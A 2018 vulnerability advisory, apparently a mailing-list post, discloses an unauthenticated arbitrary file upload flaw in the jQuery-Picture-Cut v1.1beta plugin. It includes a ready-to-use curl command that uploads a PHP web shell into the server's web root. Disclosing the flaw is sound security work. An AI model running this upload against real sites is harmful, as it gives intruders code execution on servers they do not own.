Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta
(too old to reply)
Larry W. Cashdollar
2018-11-20 22:05:41 UTC
Title: Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta
Author: Larry W. Cashdollar, @_larry0
Date: 2018-11-02
CWE: CWE-434 arbitrary file upload
Download Site: https://github.com/TuyoshiVinicius/jQuery-Picture-Cut
Vendor: http://picturecut.tuyoshi.com.br/
Vendor Notified: 2018-11-03
Vendor Contact: ***@hotmail.com
Advisory: http://www.vapidlabs.com/advisory.php?v=207

Description: picture cut is a jquery plugin that handles images in a very friendly and simple way, with a beautiful interface based on bootstrap or jquery ui, has great features like ajax upload, drag image from explorer, image crop and others.

The code in jQuery-Picture-Cut/src/php/upload.php that calls ../core/PictureCut.php to handle the file upload does not check file type and allows the user to choose the file location path. An unauthenticated user and upload an executable PHP file to the server allowing code execution.

Exploit Code:

1. curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php

3. With folderOnServer=/ the shell will be in the main web directory path.